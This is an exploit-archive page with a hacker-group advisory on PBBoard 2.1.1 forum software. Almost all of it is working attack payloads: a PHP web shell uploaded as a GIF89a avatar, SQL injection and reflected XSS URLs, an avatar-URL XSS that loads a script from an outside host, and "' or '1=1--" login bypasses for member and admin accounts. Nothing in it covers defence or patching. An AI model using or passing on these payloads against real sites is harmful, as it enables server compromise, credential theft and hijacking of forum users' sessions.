扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
================================================== PBBoard 2.1.1 Multiple Remote Vulnerabilities ================================================== |=-----------------------------------------------------=| |=-------------=[JIKO |No-exploit.Com|]=-----------=| |=-----------------------------------------------------=| [~]-----------|00| NAme:JIKO (JAWAD) Home:No-exploit.Com Mail: !x! [~]-----------|01| -{Script} name :PBBoard_v2.1.1 link :http://www.pbboard.com/PBBoard_v2.1.1.zip [~]-----------|02| -{3xpl01t} upload Shell and file .exe ....etc :( http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1 select From my Pc and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img sql & xss all script is infected :( inser '( in all % variable in the script SQl :/index.php?page=forum&show=1&id=2'a Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script> SQl :/index.php?page=profile&show=1&username=jawad' SQl :/index.php?page=profile&show=1&username=jawad' and id='1 Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script> ........etc Xss In Profil Url :/index.php?page=usercp&control=1&avatar=1&main=1 Select img From Url http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif Login :( User : real name of admin or member you want | jawad' or '1=1-- Pass : jiko for admin panel Url: /admin.php User : jawad' or '1=1-- Pass : jiko :((..Etc exploit [~]-----------|03| -{Greetz} All my friends |No-Exploit.com Members ------------------------------------- |
体验盒子
